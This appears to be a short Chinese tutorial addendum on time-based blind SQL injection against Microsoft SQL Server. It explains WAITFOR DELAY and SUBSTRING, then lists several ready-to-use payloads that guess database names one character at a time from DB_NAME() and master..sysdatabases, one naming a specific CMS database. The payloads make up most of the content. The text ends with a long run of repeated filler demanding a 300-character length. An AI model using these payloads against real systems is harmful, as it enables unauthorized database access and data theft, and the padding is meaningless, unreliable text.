补充：sqlserver 延时注入

waitfor delay '0:0:5'
等待5秒再执行操作，页面将5秒之后返回。

waitfor 是sqlserver中的一个流程控制语句，他的作用是等待特定时间，然后执行后续语句，包含了一个delay来指定等待时间。

substring() 截取字符
从username字段中的第一个字符开始截取一个字符
substring(username,1,1)

if(SUBSTRING(DB_NAME(),1,1)=CHAR(109)) waitfor delay '0:0:5'

if(substring((select top 1 name from master..sysdatabases),1,1)=char(109)) waitfor delay '0:0:5'

if(substring((select top 1 name from master..sysdatabases where name not in ('master')),1,1)='i') waitfor delay '0:0:5'

if(substring((select top 1 name from master..sysdatabases where name not in ('master','iNethinkCMS')),1,1)=char(105)) waitfor delay '0:0:5'

IF ASCII(SUBSTRING(DB_NAME(),1,1))=109 WAITFOR DELAY '0:0:5' --

if ascii(substring((select top 1 name from master..sysdatabases where name not in ('master')),1,1))=105 waitfor delay '0:0:5'

一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！

一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！一定要300字！